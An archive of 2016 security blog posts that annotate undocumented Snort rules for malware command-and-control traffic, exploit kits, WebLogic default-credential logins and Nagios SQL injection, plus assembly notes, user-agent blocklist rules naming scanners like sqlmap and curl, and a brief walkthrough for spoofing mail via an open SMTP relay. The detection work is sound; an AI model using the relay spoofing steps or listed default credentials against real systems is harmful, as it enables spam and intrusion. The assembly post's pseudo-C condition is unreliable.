Monday, December 26, 2016

1:41083 BLACKLIST suspicious .bit dns query

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created this dns query blacklist alert didn't include documentation.

(1:41083) BLACKLIST suspicious .bit dns query

alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST suspicious .bit dns query"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|03|bit|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; classtype:trojan-activity; sid:41083; rev:1; )


If I had to guess I think it's related to the .bit tld or something similar which stated.

Per the reddit The advantage to owning a .bit domain is that no government or third-party can have your DNS interrupted, it is truly a P2P DNS system with no possibility of censorship.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:41088 MALWARE-CNC Win.Trojan.MrWhite Win.Trojan.Ostap out bound communication attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created these trojan connection attempts snort alert didn't include documentation.

(1:41089) MALWARE-CNC Win.Trojan.Ostap out bound communication attempt

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Ostap out bound communication attempt"; flow:to_server,established; content:"/ostap.php"; fast_pattern:only; http_uri; content:"/ostap.php"; depth:20; offset:2; http_uri; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; classtype:trojan-activity; sid:41089; rev:1; )

(1:41088) MALWARE-CNC Win.Trojan.MrWhite out bound communication attempt

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.MrWhite out bound communication attempt"; flow:to_server,established; content:"/GOLD/bender.php"; http_uri; content:"User-Agent: Mr.White|0D 0A|"; fast_pattern:only; http_header; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; classtype:trojan-activity; sid:41088; rev:1; )


If I had to guess I think it's related to this JScript backdoor or something similar which stated.

Per the article it says MrWhite can profile the victim systems for the presence of running POS software before dropping further POS payloads. Related to financially-motivated threat actor group with access to banking Trojans and other malware, including Dridex, Ursnif, Tinba, and the point-of-sale (POS) malware AbaddonPOS with its loader, TinyLoader.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:41035 1:41084 EXPLOIT-KIT Sundown Exploit Kit redirection attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created these exploit kit alerts didn't include documentation.

(1:41035) EXPLOIT-KIT Sundown Exploit Kit redirection attempt

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"EXPLOIT-KIT Sundown Exploit Kit redirection attempt"; flow:established,to_server; content:"/noone.php"; depth:10; http_uri; metadata:impact_flag red, policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service http; classtype:trojan-activity; sid:41035; rev:1; )

(1:41084) EXPLOIT-KIT Sundown Exploit kit landing page obfuscation detected

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"EXPLOIT-KIT Sundown Exploit kit landing page obfuscation detected"; flow:to_client,established; file_data; content:"|22|script|22|"; nocase; content:"|22|createE|22|"; within:50; nocase; content:"|22|lement|22|"; within:20; nocase; content:"|22|type|22|"; within:50; nocase; content:"|22|text/j|22|"; within:50; nocase; content:"|22|avascript|22|"; within:50; nocase; metadata:policy max-detect-ips drop, policy security-ips drop, service http; classtype:attempted-user; sid:41084; rev:1; )


If I had to guess I think it's related to the Sundown Exploit Kit or something similar which stated.

Per the article, it is composed of a couple of parts: a landing page and an exploit page with a payload. This landing page then probes the user's system to determine if they are potentially vulnerable and then delivers an exploit page with a malicious payload.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:41034 MALWARE-CNC Win.Trojan.Sality variant outbound connection

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created these trojan connection attempts snort alert didn't include documentation.

(1:41034) MALWARE-CNC Win.Trojan.Sality variant outbound connection

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Sality variant outbound connection"; flow:to_server,established; content:"/images/image.gif"; fast_pattern:only; http_uri; content:"User-Agent|3A 20|"; depth:12; http_header; content:!"proxy"; nocase; http_header; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; reference:url,virustotal.com/en/file/22fc19a6d9e0ef40812d05c357beabfed6f7cb9fe72af826947acb458b911213/analysis/; classtype:trojan-activity; sid:41034; rev:1; )


If I had to guess I think it's related to this Sality Gambling campaign or something similar which stated.

It appears to the image.gif callouts download the real payload. The article also mentions Sality has incorporated the use of rootkit functions as part of the malware family’s ongoing evolution. Sality found that it delivered fake-AV malware as the final payload, able to infect not only local drives but also USB devices and network folders.
The virus total link above shows many solid hits of Win32/Sality.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:41033 MALWARE-CNC Win.Trojan.Proteus outbound connection

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created these trojan connection attempts snort alert didn't include documentation.

(1:41033) MALWARE-CNC Win.Trojan.Proteus outbound connection

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Proteus outbound connection"; flow:to_server,established; content:"/api/register"; fast_pattern:only; http_uri; content:"{|22|m|22|:|22 5C 5C|"; depth:8; http_client_body; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; reference:url,virustotal.com/en/file/d23b4a30f6b1f083ce86ef9d8ff434056865f6973f12cb075647d013906f51a2/analysis/; classtype:trojan-activity; sid:41033; rev:1; )


If I had to guess I think it's related to this link per the virustotal comments botnet Proteus or something similar which stated.

It appears to make callouts to an api for the C&C server. It appears to have keyloggers capabilities among other things.
The virus total link above shows several generic hits like Trojan.KeyLogger, TrojanDropper.Dapato, Win32.Trojan.WisdomEyes,Trojan.Dynamer, etc.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:41031 MALWARE-CNC Win.Trojan.Athena variant outbound connection

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created these trojan connection attempts snort alert didn't include documentation.

(1:41031) MALWARE-CNC Win.Trojan.Athena variant outbound connection

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Athena variant outbound connection"; flow:to_server,established; content:"User-Agent: Go-http-client"; fast_pattern:only; http_header; content:"/cmd/"; depth:5; http_uri; pcre:"/^\x2Fcmd\x2F[\-a-zA-Z0-9_+]{650,}={0,3}/U"; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; reference:url,www.virustotal.com/en/file/af385c983832273390bb8e72a9617e89becff2809a24a3c76646544375f21d14/analysis/; classtype:trojan-activity; sid:41031; rev:1; )


If I had to guess I think it's related to this malware analysis of a file called msguard.exe or something similar which stated.

It appears to make callouts to .onion addresses with cmd parameters that are likely sending or receiving information to a C&C server.
The virus total link above shows several generic hits like Win.Trojan.Athena, W32.Clodece.Trojan, Trojan.Dynamer, Trojan.Razy, etc.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wednesday, December 14, 2016

1:40912 1:40913 MALWARE-OTHER Win.Trojan.Flokibot variant download attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created these trojan download attempt snort alert didn't include documentation.

1 40913 MALWARE-OTHER Win.Trojan.Flokibot variant download attempt
alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (msg:"MALWARE-OTHER Win.Trojan.Flokibot variant download attempt"; flow:to_server,established; file_data; content:"Hash: 0x%x not loaded."; fast_pattern:only; content:"|00|B|00|O|00|T|00|3|00|2|00|"; nocase; content:"|00|K|00|E|00|Y|00|"; nocase; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service smtp; reference:url,virustotal.com/en/file/0aa1f07a2ebcdd42896d3d8fdb5e9a9fef0f4f894d2501b9cbbe4cbad673ec03/analysis/; classtype:trojan-activity; sid:40913; rev:1; ) 1 40912 MALWARE-OTHER Win.Trojan.Flokibot variant download attempt
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (msg:"MALWARE-OTHER Win.Trojan.Flokibot variant download attempt"; flow:to_client,established; file_data; content:"Hash: 0x%x not loaded."; fast_pattern:only; content:"|00|B|00|O|00|T|00|3|00|2|00|"; nocase; content:"|00|K|00|E|00|Y|00|"; nocase; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service ftp-data, service http, service imap, service pop3; reference:url,virustotal.com/en/file/0aa1f07a2ebcdd42896d3d8fdb5e9a9fef0f4f894d2501b9cbbe4cbad673ec03/analysis/; classtype:trojan-activity; sid:40912; rev:1; )


If I had to guess I think it's related to the Sednit hacking group and perhaps a rootkit they developed or something similar which stated.

Floki Bot is a malware variant that has recently been offered for sale on various darknet markets. It is based on the same codebase that was used by the infamous Zeus trojan. Floki Bot claims to feature several new capabilities making it an attractive tool for criminals. Talos also observed the introduction of new code that allows Floki Bot to make use of the Tor network.
Malwarebytes also has a good writeup on the malware.
The virus total link above shows several generic hits like Win.Trojan.Flokibot, Trojan-Spy.Zbot, Trojan.Win32.DownLoader, etc.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:40911 MALWARE-CNC Win.Rootkit.Sednit variant outbound connection attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created this sednit rootkit alert didn't include documentation.

1 40911 MALWARE-CNC Win.Rootkit.Sednit variant outbound connection attempt
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Rootkit.Sednit variant outbound connection attempt"; flow:to_server,established; urilen:11; content:"/search.php"; fast_pattern:only; http_uri; content:"as_ft="; http_client_body; content:"as_q="; http_client_body; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, ruleset community, service http; reference:url,virustotal.com/en/file/471fbdc52b501dfe6275a32f89a8a6b02a2aa9a0e70937f5de610b4185334668/analysis/1480953133/; classtype:trojan-activity; sid:40911; rev:1; )


If I had to guess I think it's related to the Sednit hacking group and perhaps a rootkit they developed or something similar which stated.

the notorious Sednit hacking group which has targeted over 1000 high-profile individuals with phishing attacks and zero-day exploits. The Sednit gang, also known as APT28, Fancy Bear, Pawn Storm and Sofacy, are highly experienced, and have been engaged in criminal activity since at least 2004. They have developed sophisticated attacks that bypass the typical network security at compromised organizations.
Another blog mentioned The obvious goal of the SEDNIT-related spyware is to steal personal data, record audio, make screenshots, and send them to a remote command-and-control (C&C) server.
The virus total link above shows several generic hits like TROJ_SEDNIT, Rootkit.BlackEnergy, Trojan-Dropper.Win32.Agent, etc.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:40910 MALWARE-CNC Win.Trojan.Locky variant outbound connection attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created this locky ransomware alert didn't include documentation.

1 40910 MALWARE-CNC Win.Trojan.Locky variant outbound connection attempt
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Locky variant outbound connection attempt"; flow:to_server,established; urilen:16; content:"POST"; http_method; content:"/information.cgi"; depth:16; fast_pattern; http_uri; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; classtype:trojan-activity; sid:40910; rev:1; )


If I had to guess I think it's related to Lockys massive spray and pray spam campaign or something similar which stated.

The encrypting malware then goes on to connect to a number of hard-coded IP addresses whose purpose is to enroll the affected computer into a botnet: http://xxxxxx / information.cgi ....

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:40906 MALWARE-CNC Win.Malware.Disttrack variant outbound connection

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created this Disttrack malware snort alert didn't include documentation.

1 40906 MALWARE-CNC Win.Malware.Disttrack variant outbound connection
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Malware.Disttrack variant outbound connection"; flow:to_server,established; content:"/category/page.php"; http_uri; content:"shinu="; fast_pattern:only; http_uri; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; reference:url,virustotal.com/en/file/61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842/analysis/; classtype:trojan-activity; sid:40906; rev:1; )


If I had to guess I think it's related to Disttrack malware that spreads across the network destroying data or something similar which stated.

Disttrack is a multipurpose tool that exhibits worm-like behavior by attempting to spread to other systems on a local network using stolen administrator credentials. More importantly, its claim to fame is the ability to destroy data and to render infected systems unusable. The data in “shinu” parameter is a combination of the system’s tickcount, local IP address, operating system version, keyboard layout and the contents of %WINDOWS%\inf\netimm173.pnf. The C2 server can respond to this HTTP request
The virus total link provided has hits on things such as Trojan/Win32.DistTrack , DistTrack!comm , etc.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:40905 SERVER-WEBAPP Oracle Weblogic default credentials login attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created this default credential alert didn't include documentation.

1 40905 SERVER-WEBAPP Oracle Weblogic default credentials login attempt
alert tcp $EXTERNAL_NET any -> $HOME_NET 7001 (msg:"SERVER-WEBAPP Oracle Weblogic default credentials login attempt"; flow:to_server,established; content:"/j_security_check"; fast_pattern:only; http_uri; content:"j_username="; http_client_body; content:"j_password=weblogic"; http_client_body; pcre:"/j_username=(root|system)/P"; metadata:policy balanced-ips drop, policy security-ips drop, service http; classtype:attempted-admin; sid:40905; rev:1; )

1 40904 SERVER-WEBAPP Oracle Weblogic default credentials login attempt
alert tcp $EXTERNAL_NET any -> $HOME_NET 7001 (msg:"SERVER-WEBAPP Oracle Weblogic default credentials login attempt"; flow:to_server,established; content:"/j_security_check"; fast_pattern:only; http_uri; content:"j_username=weblogic"; http_client_body; content:"j_password"; http_client_body; pcre:"/j_password=(welcome1|weblogic|admin)/P"; metadata:policy balanced-ips drop, policy security-ips drop, service http; classtype:attempted-admin; sid:40904; rev:1; )


If I had to guess I think it's related to Oracles documenation on default credentials for WebLogic or something similar which stated.

In the tutorial the username is weblogic and the password is Welcome1.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:40991 MALWARE-CNC Linux.DDoS.D93 outbound connection

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created this DDoS snort alert didn't include documentation.

(1:40991) MALWARE-CNC Linux.DDoS.D93 outbound connection
alert tcp $HOME_NET any -> $EXTERNAL_NET 31337 (msg:"MALWARE-CNC Linux.DDoS.D93 outbound connection"; flow:to_server; content:"|4E 0F 42 07 27|"; depth:5; dsize:25; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, ruleset community, service http; reference:url,www.virustotal.com/en/file/2c017c94d9f40cba9a20e92c7c636e98de15c599bf004fa06508d701ab9e3068/analysis/; classtype:trojan-activity; sid:40991; rev:1; ) v:1; )


If I had to guess I think it's related to this article on Linux DDoS 93 or something similar which stated.

Crooks are hijacking devices running Linux-based operating systems and use them to launch DDoS attacks at their behest. Dr.Web security researchers say the trojan seems to infect Linux machines via the Shellshock vulnerability, still unpatched in a large number of devices.

The virus total link in the alert above has hits for Linux.DDoS.93 , Linux.DDOS.Flood.W , etc.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:41018 1:41019 SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whomever created these 2 new sql injection snort alerts for nagios didn't include documentation.

1 41019 SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt"; flow:to_server,established; content:"nagiosxi/includes/components/nagiosim/nagiosim.php"; fast_pattern:only; http_uri; content:"host="; nocase; http_uri; pcre:"/[?&]host=[^&]*?([\x60\x3b\x7c]|\x24\x28)/Ui"; metadata:policy security-ips drop, service http; classtype:web-application-attack; sid:41019; rev:1; )

1 41018 SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt"; flow:to_server,established; content:"nagiosxi/includes/components/nagiosim/nagiosim.php"; fast_pattern:only; http_uri; content:"host="; nocase; http_raw_uri; content:"%26"; distance:0; http_raw_uri; pcre:"/[?&]host=[^&]*?%26/Ii"; metadata:policy security-ips drop, service http; classtype:web-application-attack; sid:41018; rev:1; )


If I had to guess I think it's related to this disclosure or something similar which stated.

The ‘host’ and ‘service’ GET parameters in the ‘nagiosim.php’ page are vulnerable to SQL injection via error-based payloads

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Documentation-less Snort Rules

Has anybody else noticed that what seems like the majority of new snort rules that come out and you can use in an IDS (intrusion detection systems) like Sourcefire don't have any documentation? You're stuck with

Summary: This rule does not have documentation


Or if you're lucky some link to a virus total page with no other explanation.

Well I thought it might be interesting to try to collect some brief links or documentation around some documentation-less snort rules. I did not write the rules, I have no insight into who did or why they did. I did not write the documentation either, I simply collected the information and put it in a spot where maybe if you're lucky and google searching why a snort rule fired and what it means, then I was just hoping this documentation would be helpful for you. Enjoy.

Sample initial documentation I put together for the documentation-less:
- SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt 41018 41019
- MALWARE-CNC Linux.DDoS.D93 outbound connection 40991
- SERVER-WEBAPP Oracle Weblogic default credentials login attempt 40905 40905
- MALWARE-CNC Win.Malware.Disttrack variant outbound connection 40906
- MALWARE-CNC Win.Trojan.Locky variant outbound connection attempt 40910
- MALWARE-CNC Win.Rootkit.Sednit variant outbound connection attempt 40911
- MALWARE-OTHER Win.Trojan.Flokibot variant download attempt 40912 40913


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Saturday, September 24, 2016

Intel Assembly Basics movl , cmpl , jns

Intel Assembly Basics



Here's a simple code block, what does it do?

0x080483c1 <+6>: movl $0x15,-0x4(%ebp)
0x080483c8 <+13>: cmpl $0x0,-0x4(%ebp)
0x080483cc <+17>: jns 0x80483d5
0x080483ce <+19>: movl $0xf,-0x4(%ebp)
0x080483d5 <+26>: ...

movl is 'move long' which in this case is a 32 bit integer. Hex 0x15 is 16+5=21 so it's putting 21 onto the first value in the stack (-0x4).

cmpl is 'compare long' so it's comparing 2 integers, the value 0x0 which is simply 0 and the first value on the stack (-0x4) which from the previous line we know has a value 21. Hex 0x15 is 16+5=21 so it's putting 21 onto the first value in the stack (-0x4). Compare wants to determine if the values are the same or different. So it does that by subtracting 21 - 0 . If the result of the subtraction is 0 then it would set the Zero Flag (ZF) to 1 (or true). If the result of the subtraction is anything else then it sets the Zero Flag (ZF) to 0 (or false). Thus in this case 21-0=21 so the Zero Flag (ZF) is set to 0 (or false). Also the compare instruction sets the Sign Flag (SF) to 1 if the result is a negative number and and 0 if it's positive. In this case it's +21 to it's positive so it's set to 0.

jns is 'jump if not signed'. Jump if not signed jumps if the Sign Flag (SF) is 0 (thus if the previous compare result was positive +). So in this case SF was set to 0 which means the value was positive (or not signed), so it's going to jump to address 0x80483d5.

movl is 'move long' again just like above, and this time it's putting 15 into the top value in the stack (-0x4), but in this case since we jumped, this instruction never actually gets executed.



Thus to wrap this all up, you could rewrite this code in psuedo C code as follows

int x = 21;
if(x < 21)
 x = 15;


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Intel Assembly Basics GCC and GDB Disassembly

Intel Assembly Basics



I want to write a C program in linux and see what X86 assembly it generates. Let's try this.

nano increment.c

int main(){
  int x = 15;
  x++;
}


gcc -mpreffered-stack-boundary=2 --ggdb increment.c -o increment

gdb ~/increment

(gdb) disas main

Dump of assembler code for function main:
  0x080483bb <+0>: push %ebp
  0x080483bc <+1>: mov %esp,%ebp
  0x080483be <+3>: sub $0x4,%esp
  0x080483c1 <+6>: movl $0xf,-0x4(%ebp)
  0x080483c8 <+13>: addl $0x1,-0x4(%ebp)
  0x080483cc <+17>: mov $0x0,%eax
  0x080483d1 <+22>: leave
  0x080483d2 <+23>: ret
End of assembler dump.


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, September 16, 2016

Sending SMTP Emails

This kali tutorial on SMTP hacking give a simple walk-through

If you find a vulnerable SMTP server that does not require authentication you can telnet or netcat to it on port 25.

First greet the server with HELO thedomain.com

Next start a message with the sender MAIL FROM: sendingvictim@thedomain.com

And set the recipient RCPT TO: spamvictim@somewhere.com

And start the body by typing DATA

Enter the subject with SUBJECT: my subject

Then type in the body of the email you want

Then type . and hit <ENTER> to send the email

Then get out of there with QUIT



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Snort Rules Monitoring User-Agents

I think some Snort rules like these could be used to monitor specific user-agents that sometimes are common with recon, vulnerability scans, and exploits.

WPScan

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"WPScan"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*WPScan/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string WPScan - vulnerability scanner"; classtype:network-scan; rev:1; )

Wget

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Wget"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20Wget/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string Wget non-browser"; classtype:network-scan; rev:1; )

Synapse

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Synapse"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Synapse/Hm"; metadata:service http; reference:url,http://www.spambotsecurity.com/forum/viewtopic.php?f=43&t=2876; msg:"BLACKLIST User-Agent known malicious user-agent string Synapse - SQLi IoC"; classtype:network-scan; rev:1; )

SqlMap

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"sqlmap"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*sqlmap/Hm"; metadata:service http; reference:url,http://sqlmap.org/; msg:"BLACKLIST User-Agent known malicious user-agent string sqlmap - vulnerability scanner"; classtype:network-scan; rev:1; )

Python

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Python-urllib"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20Python/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string Python non-browser"; classtype:network-scan; rev:3; )

PycURL

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"PycURL"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*PycURL/Hm"; metadata:service http; reference:url,http://pycurl.io/; msg:"BLACKLIST User-Agent known malicious user-agent string PycURL - non Browser"; classtype:network-scan; rev:1; )

Paros

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Paros"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Paros/Hm"; metadata:service http; reference:url,http://sectools.org/tool/paros/; msg:"BLACKLIST User-Agent known malicious user-agent string Paros - vulnerability scanner"; classtype:network-scan; rev:1; )

OpenVAS

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"OpenVAS"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*OpenVAS/Hm"; metadata:service http; reference:url,http://www.openvas.org/; msg:"BLACKLIST User-Agent known malicious user-agent string OpenVAS - vulnerability scanner"; classtype:network-scan; rev:2; )

Nmap

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Nmap"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Nmap/Hm"; metadata:service http; reference:url,https://nmap.org/book/nse.html; msg:"BLACKLIST User-Agent known malicious user-agent string Nmap - scanner"; classtype:network-scan; rev:2; )

Nikto

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Nikto"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Nikto/Hm"; metadata:service http; reference:url,http://sectools.org/tool/nikto/; msg:"BLACKLIST User-Agent known malicious user-agent string Nikto - vulnerability scanner"; classtype:network-scan; rev:1; )

Kazehakase

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Kazehakase"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Kazehakase/Hm"; metadata:service http; reference:url,https://en.wikipedia.org/wiki/Kazehakase; msg:"BLACKLIST User-Agent known malicious user-agent string Kazehakase - suspicious browser"; classtype:network-scan; rev:1; )

curl

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"curl"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*curl/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string curl - non browswer"; classtype:network-scan; rev:1; )

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


